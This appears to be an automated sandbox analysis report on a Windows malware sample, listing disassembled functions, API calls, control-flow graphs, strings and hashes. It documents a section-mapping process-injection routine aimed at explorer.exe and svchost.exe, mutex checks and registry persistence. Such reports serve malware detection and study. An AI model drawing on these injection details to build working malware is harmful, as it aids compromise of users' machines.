                          • NtCreateSection.NTDLL(00000000,0000000E,00000000,?,00000040,08000000,00000000), ref: 00410F86
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00410FCF
                          • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 00410FDD
                          • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00411028
                          • NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 00411077
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 004110BD
                          • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 004110CB
                          • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 00411116
                          • _memmove.LIBCMT ref: 0041113E
                          • _memmove.LIBCMT ref: 00411177
                          • _memmove.LIBCMT ref: 004111B0
                          • lstrcpyW.KERNEL32(?,KERNEL32.DLL), ref: 004111D0
                          • lstrcpyW.KERNEL32(?,USER32.DLL), ref: 004111E8
                          • lstrcpyA.KERNEL32(?,LoadLibraryW), ref: 00411200
                          • lstrcpyA.KERNEL32(?,GetProcAddress), ref: 00411217
                          • lstrcpyA.KERNEL32(?,Sleep), ref: 0041122F
                          • lstrcpyA.KERNEL32(?,LoadLibraryA), ref: 00411247
                          • lstrcpyA.KERNEL32(?,LocalAlloc), ref: 0041125E
                          • lstrcpyA.KERNEL32(?,VirtualAlloc), ref: 00411276
                          • lstrcpyA.KERNEL32(?,LocalFree), ref: 0041128E
                          • lstrcpyA.KERNEL32(?,CloseHandle), ref: 004112A5
                          • lstrcpyA.KERNEL32(?,VirtualFree), ref: 004112BD
                          • lstrcpyA.KERNEL32(?,MessageBoxW), ref: 004112D5
                          • lstrcpyA.KERNEL32(?,VirtualProtect), ref: 004112EC
                          • _memmove.LIBCMT ref: 00411329
                            • Part of subcall function 00405710: GetCurrentProcess.KERNEL32(0047F5AC,?,00411363), ref: 00405718
                            • Part of subcall function 00405710: IsWow64Process.KERNEL32(00000000,?,00411363), ref: 0040571F
                            • Part of subcall function 00405710: GetProcessHeap.KERNEL32(?,00411363), ref: 00405725
                          • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00411457
                          • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 0041146B
                          • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 0041147F
                          • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00411490
                          • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 004114A1
                          • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 004114B2
                          • NtClose.NTDLL(00000000), ref: 004114BF
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 004114F3
                          • CloseHandle.KERNEL32(?), ref: 004115D1
                          • CloseHandle.KERNEL32(?), ref: 004115DE
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 004115EB
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Section$lstrcpy$View$ProcessWow64$Unmap$CreateCurrent_memmove$CloseDisableRedirection$Handle_memset$Heap_wcsrchr
                          • String ID: 777367648777262762$897878765347627341$CloseHandle$D$GetProcAddress$KERNEL32.DLL$LoadLibraryA$LoadLibraryW$LocalAlloc$LocalFree$MessageBoxW$NTDLL.DLL$RtlCreateUserThread$Sleep$USER32.DLL$VirtualAlloc$VirtualFree$VirtualProtect
                          • API String ID: 851839342-117320160
                          • Opcode ID: b2224f8b226e7ea511b9d734777c03b8a2ab762239ba783e776ab89f80f77c31
                          • Instruction ID: 8e27ae5f55abf712d166e728743ac6ae8c417ed9e92c48e352670e92dcec7a34
                          • Opcode Fuzzy Hash: b2224f8b226e7ea511b9d734777c03b8a2ab762239ba783e776ab89f80f77c31
                          • Instruction Fuzzy Hash: 38323EB5A40218AFDB24DF64DC8DF9AB774EB48704F1045E9B20DA7290DB74AE84CF58
                          Function 00401000 Relevance: 41.0, APIs: 20, Strings: 3, Instructions: 724synchronizationCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00419140: LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 0041914E
                          • ExitProcess.KERNEL32 ref: 0040103B
                          • _memset.LIBCMT ref: 00401058
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 004010A0
                          • CreateMutexW.KERNELBASE(0000000C,00000000,0047B18C), ref: 004010D2
                          • OpenEventW.KERNEL32(00100002,00000000,004797F4), ref: 00401116
                          • ExitProcess.KERNEL32 ref: 00401197
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcessWow64$CreateDisableEventLibraryLoadMutexOpenRedirection_memset
                          • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe
                          • API String ID: 2030883397-2596767422
                          • Opcode ID: 1b1bdfa044f38bd1d07ea9bd9e2dcf74c9d44c73de0847807d9cb33cb774bd22
                          • Instruction ID: 2ecc7c394b58b1c41625a16d2b29e790adc180c7ad411e2bfa6d88d98b836a10
                          • Opcode Fuzzy Hash: 1b1bdfa044f38bd1d07ea9bd9e2dcf74c9d44c73de0847807d9cb33cb774bd22
                          • Instruction Fuzzy Hash: 8062A2B0A402149FDB249F60EC49B9977B5FB44706F1041BAF60DB62E0DBB99AC4CF19
                          Function 0040CBF0 Relevance: 28.7, APIs: 19, Instructions: 229stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 579 40cbf0-40cc24 GetCommandLineW lstrcmpiW 581 40cc35-40cc49 lstrcmpiW 579->581 582 40cc26-40cc30 579->582 584 40cd16-40cd2a lstrcmpiW 581->584 585 40cc4f-40cc62 581->585 583 40cf39 582->583 586 40cf3e-40cf41 583->586 587 40cd30-40cd49 OpenMutexW 584->587 588 40cdf5-40ce09 lstrcmpiW 584->588 594 40cc64-40cc84 585->594 595 40ccbc 585->595 589 40cd64-40cd7d OpenMutexW 587->589 590 40cd4b-40cd5d 587->590 592 40cece-40cee2 lstrcmpiW 588->592 593 40ce0f-40ce28 OpenMutexW 588->593 599 40cd98-40cd9f 589->599 600 40cd7f-40cd84 589->600 590->589 592->583 598 40cee4-40ceeb 592->598 596 40ce43-40ce5c OpenMutexW 593->596 597 40ce2a-40ce3c 593->597 618 40ccb2 594->618 619 40cc86-40cc92 594->619 609 40ccc4-40cccb 595->609 604 40ce77-40ce7e 596->604 605 40ce5e-40ce63 596->605 597->596 602 40cf27-40cf37 Sleep 598->602 603 40ceed-40cf0d OpenMutexW 598->603 606 40cda1-40cdc1 OpenMutexW 599->606 607 40cddb-40cdeb Sleep 599->607 613 40cd8b-40cd91 600->613 602->586 611 40cf23 603->611 612 40cf0f-40cf21 Sleep 603->612 616 40ce80-40cea0 OpenMutexW 604->616 617 40ceba-40ceca Sleep 604->617 622 40ce6a-40ce70 605->622 614 40cdc3-40cdd5 Sleep 606->614 615 40cdd7 606->615 607->586 620 40cd07-40cd0c 609->620 621 40cccd-40cced 609->621 611->602 612->598 613->599 614->599 615->607 623 40cea2-40ceb4 Sleep 616->623 624 40ceb6 616->624 617->586 627 40ccba 618->627 631 40cc94-40cc9e 619->631 632 40cca6-40ccb0 619->632 620->586 633 40cd03 621->633 634 40ccef-40cd01 621->634 622->604 623->604 624->617 627->609 631->632 632->627 633->620 634->609
                          APIs
                          • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401191), ref: 0040CBF6
                          • lstrcmpiW.KERNELBASE(?,0047C02C), ref: 0040CC1C
                          • lstrcmpiW.KERNEL32(?,0047BA14), ref: 0040CC41
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcmpi$CommandLine
                          • String ID:
                          • API String ID: 651898456-0
                          • Opcode ID: 4d93de4eec2aa3969e8e97d8ea455facc18b1b5651a4922261509d52f99a34b8
                          • Instruction ID: 4ddbac3731ada47e5b8fe08fae1d81555edb17e003b0b40b71001650aaa6c5d5
                          • Opcode Fuzzy Hash: 4d93de4eec2aa3969e8e97d8ea455facc18b1b5651a4922261509d52f99a34b8
                          • Instruction Fuzzy Hash: B1915074A04304EBD7189FA4ED8DBAE7B75FB48705F20823AF616B62D0C7B89441CB59
                          Function 004084A0 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 121COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset$__snwprintf$Directory$FileModuleNameSystemWindows
                          • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe
                          • API String ID: 60459999-2596767422
                          • Opcode ID: b5bd5c43134f5c68d2434f6ff5daeb3a02a4d9e06ca0d3bb7c8f35eac5b00b71
                          • Instruction ID: e96b8822e26b136014f346bef2b24364fa773f38e8d30bd51aa002ba671eac81
                          • Opcode Fuzzy Hash: b5bd5c43134f5c68d2434f6ff5daeb3a02a4d9e06ca0d3bb7c8f35eac5b00b71
                          • Instruction Fuzzy Hash: 7641FA71A103186AD720EB609C46FE77338AF84B00F4449A9B608E11C1FFB99AD4CF99
                          Function 00406BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 668 406bc0-406c12 call 4245f0 672 406ce6 668->672 673 406c18-406c3b call 41d650 668->673 674 406ce8-406ceb 672->674 673->672 677 406c41-406c81 call 42466a RegOpenKeyExW 673->677 680 406c83-406ca9 RegSetValueExW 677->680 681 406cd9-406cdf 677->681 682 406cab-406cca LocalFree 680->682 683 406ccc-406cd2 680->683 681->672 682->674 683->681
                          APIs
                          • _memset.LIBCMT ref: 00406BF4
                            • Part of subcall function 0041D650: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00406C2B,?,00000000), ref: 0041D66C
                            • Part of subcall function 0041D650: GetFileSize.KERNEL32(000000FF,00000000,?,00406C2B,?), ref: 0041D681
                            • Part of subcall function 0041D650: LocalAlloc.KERNELBASE(00000040,000000FF,?,00406C2B), ref: 0041D696
                            • Part of subcall function 0041D650: ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 0041D6B7
                            • Part of subcall function 0041D650: CloseHandle.KERNELBASE(000000FF), ref: 0041D6CD
                          • __snwprintf.LIBCMT ref: 00406C57
                          • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00000102,?), ref: 00406C79
                          • RegSetValueExW.KERNELBASE(?,0047C0C8,00000000,00000003,00000000,00000000), ref: 00406CA1
                          • LocalFree.KERNELBASE(00000000), ref: 00406CBF
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleOpenReadSizeValue__snwprintf_memset
                          • String ID: SOFTWARE\%s
                          • API String ID: 1138034345-297323700
                          • Opcode ID: f19c92ff1a245698797063612a0a0abab841d21ab3079ac34653b2421a43fb35
                          • Instruction ID: 4dbb56e6917a1da8e171bb8894cbc70e332e4860116f3715e570d109d2154552
                          • Opcode Fuzzy Hash: f19c92ff1a245698797063612a0a0abab841d21ab3079ac34653b2421a43fb35
                          • Instruction Fuzzy Hash: 7921A0B5A40318ABE720DB60DC4DFEA7338FB54700F4085A9E20DA6181E7B89AC4CF58
                          Function 0041D650 Relevance: 10.6, APIs: 7, Instructions: 62filememoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 685 41d650-41d679 CreateFileW 686 41d6f4 685->686 687 41d67b-41d68e GetFileSize 685->687 690 41d6f6-41d6f9 686->690 688 41d690-41d6a3 LocalAlloc 687->688 689 41d6ea-41d6ee CloseHandle 687->689 688->689 691 41d6a5-41d6bf ReadFile 688->691 689->686 692 41d6c1-41d6c7 691->692 693 41d6e0-41d6e4 LocalFree 691->693 692->693 694 41d6c9-41d6de CloseHandle 692->694 693->689 694->690
                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00406C2B,?,00000000), ref: 0041D66C
                          • GetFileSize.KERNEL32(000000FF,00000000,?,00406C2B,?), ref: 0041D681
                          • LocalAlloc.KERNELBASE(00000040,000000FF,?,00406C2B), ref: 0041D696
                          • ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 0041D6B7
                          • CloseHandle.KERNELBASE(000000FF), ref: 0041D6CD
                          • LocalFree.KERNEL32(00000000), ref: 0041D6E4
                          • CloseHandle.KERNEL32(000000FF,?,00406C2B), ref: 0041D6EE
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                          • String ID:
                          • API String ID: 2550598358-0
                          • Opcode ID: 258461c174a5af7792d2e170b3a5b610d5ba3921d79e7e063af4c8645c32e7f3
                          • Instruction ID: b85e8838005ae7857ce374d04d39e8da710c2da74ff1ddd55a270a0ed82ccddf
                          • Opcode Fuzzy Hash: 258461c174a5af7792d2e170b3a5b610d5ba3921d79e7e063af4c8645c32e7f3
                          • Instruction Fuzzy Hash: C9210875E00208FBDB14DFE4D898FDEB778EB88711F108599F629A72D0D634AA41CB58
                          Function 00406AE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62registrystringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 695 406ae0-406b1e call 4245f0 699 406b24-406b64 call 42466a 695->699 700 406bba 695->700 699->700 705 406b66-406b97 lstrlenW RegSetValueExW 699->705 701 406bbc-406bbf 700->701 706 406b99-406bab 705->706 707 406bad-406bb3 705->707 706->701 707->700
                          APIs
                          • _memset.LIBCMT ref: 00406B00
                          • __snwprintf.LIBCMT ref: 00406B3A
                          • lstrlenW.KERNEL32(?), ref: 00406B6D
                          • RegSetValueExW.KERNELBASE(?,0047C1B2,00000000,00000001,?,00000002), ref: 00406B8F
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value__snwprintf_memsetlstrlen
                          • String ID: SOFTWARE\%s
                          • API String ID: 4060651786-297323700
                          • Opcode ID: cf8dcb7eb7b22e55080df15b51e923374bd852b0bc5fca449b6a78fafd7c5703
                          • Instruction ID: fbcec564c88f7f5d5d308845b23355da71e4b7c2306ae5adb6ae419ea5acf669
                          • Opcode Fuzzy Hash: cf8dcb7eb7b22e55080df15b51e923374bd852b0bc5fca449b6a78fafd7c5703
                          • Instruction Fuzzy Hash: 9F11B4B5A003146BDB20DB60DC4DFE73338EB44700F4042A9B61DE61C2EAB49A848B59
                          Function 00407FE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 709 407fe0-40802e call 42466a RegCreateKeyExW 712 408030-408032 709->712 713 408034-40805c RegCloseKey call 4245f0 call 4080a0 709->713 714 408095-408098 712->714 719 408090 713->719 720 40805e-408080 call 408150 713->720 719->714 724 408085-40808a 720->724 724->719 725 40808c-40808e 724->725 725->714
                          APIs
                          • __snwprintf.LIBCMT ref: 00407FFF
                          • RegCreateKeyExW.KERNELBASE(80000001,?,00000000,00000000,00000000,000F013F,00000000,00401578,00000000), ref: 00408026
                          • RegCloseKey.KERNELBASE(00401578), ref: 00408038
                          • _memset.LIBCMT ref: 00408046
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreate__snwprintf_memset
                          • String ID: SOFTWARE\%s
                          • API String ID: 2176588963-297323700
                          • Opcode ID: 641c71ac9784cb3a57ab2943aa0143da861c9ce0e151c16bc0d66715283b04a1
                          • Instruction ID: d89a81bad2e92da19c4e3732ea73f8e1d8734e7b63bb46cc24fbd9d7b5bb6ae8
                          • Opcode Fuzzy Hash: 641c71ac9784cb3a57ab2943aa0143da861c9ce0e151c16bc0d66715283b04a1
                          • Instruction Fuzzy Hash: 8211A771A40209B6EB10EBB09D4AFFB732CAB14704F00097DB749E50C1FEB9A648C799
                          Function 00405CB0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 222COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: _malloc
                          • String ID: LdrGetProcedureAddress
                          • API String ID: 1579825452-3058439150
                          • Opcode ID: e34e06494e395cee6efe99d20ff6183dd7e3cf5601c7517009c8d8f59f7a8588
                          • Instruction ID: dab4a983c6c40b0aff8208c0c8e888a8bc771f5e1fbc1f9c5a4fb952750aab3a
                          • Opcode Fuzzy Hash: e34e06494e395cee6efe99d20ff6183dd7e3cf5601c7517009c8d8f59f7a8588
                          • Instruction Fuzzy Hash: 9FA136B1D00218DBEB24EB98CC95BEEB7B5EB48304F1482ADE00677281D7396E85CF55
                          Function 004080A0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 791 4080a0-4080e6 call 42466a RegOpenKeyExW 794 4080e8-408119 RegGetValueW 791->794 795 40813c 791->795 796 40811b-40812a 794->796 797 40812e-40813a 794->797 798 40813e-408141 795->798 796->798 797->798
                          APIs
                          • __snwprintf.LIBCMT ref: 004080BF
                          • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,000F013F,?), ref: 004080DE
                          • RegGetValueW.KERNELBASE(?,?,0047BD20,00000008,00000000,00408057,0000000C), ref: 00408111
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: OpenValue__snwprintf
                          • String ID: SOFTWARE\%s
                          • API String ID: 999282410-297323700
                          • Opcode ID: 9d10d6697fe3a29f9e006c8e23d17be86a7ca428fbc77320804d6aac45eef5a5
                          • Instruction ID: 70a00890e79d645c898b447a2cffb9fe1ff2796eb1a97796f0715af71e561167
                          • Opcode Fuzzy Hash: 9d10d6697fe3a29f9e006c8e23d17be86a7ca428fbc77320804d6aac45eef5a5
                          • Instruction Fuzzy Hash: 77019675704308BBD720DBA0DD49FEA7378FF44700F5045A9B64DE6180E7B99A44DB94
                          Function 00408150 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 408150-408196 call 42466a RegOpenKeyExW 804 408198-4081b3 RegSetValueExW 801->804 805 4081cd 801->805 806 4081c3-4081c6 804->806 807 4081b5-4081c1 804->807 808 4081d2-4081d5 805->808 806->805 807->808
                          APIs
                          • __snwprintf.LIBCMT ref: 0040816F
                          • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,000F013F,?), ref: 0040818E
                          • RegSetValueExW.KERNELBASE(?,0047BD20,00000000,00000003,00408085,0000000C), ref: 004081AB
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: OpenValue__snwprintf
                          • String ID: SOFTWARE\%s
                          • API String ID: 999282410-297323700
                          • Opcode ID: 6d3a57c83b3b829178234cc15c44f6c33726e272421d2e346b05e20375fec168
                          • Instruction ID: aed4c7d27855a0ff0e38af9d29d5558bb421efdde5d6169d4f27df16ae01b2c2
                          • Opcode Fuzzy Hash: 6d3a57c83b3b829178234cc15c44f6c33726e272421d2e346b05e20375fec168
                          • Instruction Fuzzy Hash: F4018675B44308BBE710DBA0DD4AFAB7328EB44B40F504579B609AA1C0D6B9AA449B98
                          Function 0040CA60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 810 40ca60-40ca7b 812 40ca81-40ca95 LocalAlloc 810->812 813 40cb4f 810->813 814 40cb45-40cb48 812->814 815 40ca9b-40cac2 812->815 816 40cb51-40cb54 813->816 814->813 818 40cac4-40cad0 call 40cf50 815->818 819 40cb3b-40cb3e 815->819 818->819 822 40cad2-40caf7 CreateDirectoryW 818->822 819->814 823 40cb06-40cb29 822->823 824 40caf9-40cb04 822->824 823->816 824->823 827 40cb2b-40cb2f 824->827 827->819 829 40cb31-40cb34 827->829 829->819
                          APIs
                          • LocalAlloc.KERNELBASE(00000040,0000FFFE,?,?,?,?,004015D2,00473900), ref: 0040CA88
                            • Part of subcall function 0040CF50: _memset.LIBCMT ref: 0040CFB3
                          • CreateDirectoryW.KERNELBASE(?,0000000C), ref: 0040CAEE
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocCreateDirectoryLocal_memset
                          • String ID: %s\%s
                          • API String ID: 2132535065-4073750446
                          • Opcode ID: d3d2b31eebb722a1a81289f5ae57c4f4aaf94c55dce4e1f5439fb6196ee5bff7
                          • Instruction ID: 4bfe5e81821697f294c0e6658054cd858778d5f0b8e1fa09720da18102415c62
                          • Opcode Fuzzy Hash: d3d2b31eebb722a1a81289f5ae57c4f4aaf94c55dce4e1f5439fb6196ee5bff7
                          • Instruction Fuzzy Hash: D6214174904208EBDB14DFE4EC89BAE7779FF48701F504575F605A2290C778AA84CB59
                          Function 0041D590 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 831 41d590-41d5ce ConvertStringSecurityDescriptorToSecurityDescriptorW 832 41d5d0-41d5e8 831->832 833 41d60f-41d612 831->833 835 41d605-41d609 LocalFree 832->835 836 41d5ea-41d5fb 832->836 835->833 837 41d602 836->837 837->835
                          APIs
                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NW;;;LW),00000001,00000000,00000000), ref: 0041D5C6
                          • LocalFree.KERNEL32(00000000), ref: 0041D609
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: DescriptorSecurity$ConvertFreeLocalString
                          • String ID: S:(ML;;NW;;;LW)
                          • API String ID: 3326902457-495562761
                          • Opcode ID: 79222ebb5228f6e4e3b2dd9fb378911f885dc9ee49feef9d9fc5a7ce2118e8ff
                          • Instruction ID: c7c91e79f79da7d65a0ee90aa3ae02f9d2027fb2d3caa575ff1c77d4af20dbca
                          • Opcode Fuzzy Hash: 79222ebb5228f6e4e3b2dd9fb378911f885dc9ee49feef9d9fc5a7ce2118e8ff
                          • Instruction Fuzzy Hash: C301DAB5A40209ABEB10DFD0CD59FEFB7B8BB48700F104559E605AA2C0D7B5AA44CBA5
                          Function 0040014C Relevance: 3.7, APIs: 1, Instructions: 2206COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: be3e56241cb29c3850425ed2d43413ef6fe304864ee02a70e677b39d173f0d9b
                          • Instruction ID: 6066d2bbd51ae5fa476b167245d919cb16194c17d4b571326d94cd7ea5d6c210
                          • Opcode Fuzzy Hash: be3e56241cb29c3850425ed2d43413ef6fe304864ee02a70e677b39d173f0d9b
                          • Instruction Fuzzy Hash: 69519AA580E3C04FD70387B499A96903FB0AE27250B0E45EBC4C5DF1B3D26C5D5AD32A
                          Function 004018F3 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1130 4018f3-4018fc 1131 401902-40190e 1130->1131 1132 401c02 1131->1132 1133 401914-40191b 1131->1133 1138 401c07-401c13 call 40c610 1132->1138 1139 4018e7-4018f1 1132->1139 1135 401950-40198c call 410d50 1133->1135 1136 40191d-40194e call 40d7f0 1133->1136 1144 401992-401999 1135->1144 1136->1144 1148 401c24-401c2c call 41d2c0 1138->1148 1149 401c15-401c1d 1138->1149 1139->1131 1146 401bf2 1144->1146 1147 40199f-4019a6 1144->1147 1156 401bfd 1146->1156 1150 401b32-401b83 1147->1150 1151 4019ac-4019ba 1147->1151 1157 401c3b-401c46 ExitProcess 1148->1157 1158 401c2e-401c35 Wow64DisableWow64FsRedirection 1148->1158 1149->1148 1169 401b85-401b8c 1150->1169 1170 401b8e-401b95 1150->1170 1154 401a2a-401a38 1151->1154 1155 4019bc-4019d0 1151->1155 1160 401aa9-401ab7 1154->1160 1161 401a3a-401a4e 1154->1161 1155->1154 1167 4019d2-4019f1 1155->1167 1156->1132 1158->1157 1162 401b28 1160->1162 1163 401ab9-401acd 1160->1163 1161->1160 1171 401a50-401a6f OpenMutexW 1161->1171 1162->1138 1163->1162 1172 401acf-401aee 1163->1172 1180 4019f3-401a06 1167->1180 1181 401a14-401a1b 1167->1181 1169->1132 1173 401ba6-401bad 1170->1173 1174 401b97-401b9f 1170->1174 1175 401a71-401a85 1171->1175 1176 401a93-401a9a 1171->1176 1189 401af0-401b04 1172->1189 1190 401b12-401b19 1172->1190 1178 401bbc-401bc3 1173->1178 1179 401baf-401bb5 1173->1179 1174->1173 1191 401a91 1175->1191 1192 401a87 1175->1192 1176->1160 1182 401a9c-401aa2 1176->1182 1186 401bd2-401bf0 call 4245f0 1178->1186 1187 401bc5-401bcb 1178->1187 1179->1178 1196 401a12 1180->1196 1197 401a08 1180->1197 1181->1154 1183 401a1d-401a23 1181->1183 1182->1160 1183->1154 1186->1156 1187->1186 1200 401b10 1189->1200 1201 401b06 1189->1201 1190->1162 1195 401b1b-401b21 1190->1195 1191->1161 1192->1138 1195->1162 1196->1155 1197->1138 1200->1163 1201->1138
                          APIs
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00401C35
                          • ExitProcess.KERNEL32(00000000), ref: 00401C3D
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wow64$DisableExitProcessRedirection
                          • String ID:
                          • API String ID: 3835450656-0
                          • Opcode ID: 6fa488a04dd16c96343786a33c2b62a001ae4c619b394e2a8cad49dc75fed1c5
                          • Instruction ID: 91adefb99382e5ad79ee56fd4990a73d0c6f1281317b32aedbce968e10b59d6e
                          • Opcode Fuzzy Hash: 6fa488a04dd16c96343786a33c2b62a001ae4c619b394e2a8cad49dc75fed1c5
                          • Instruction Fuzzy Hash: 1C214F70A041149BDB34DF64DD49B997376FB88315F1046BAE109722A0C7799ED4CF19
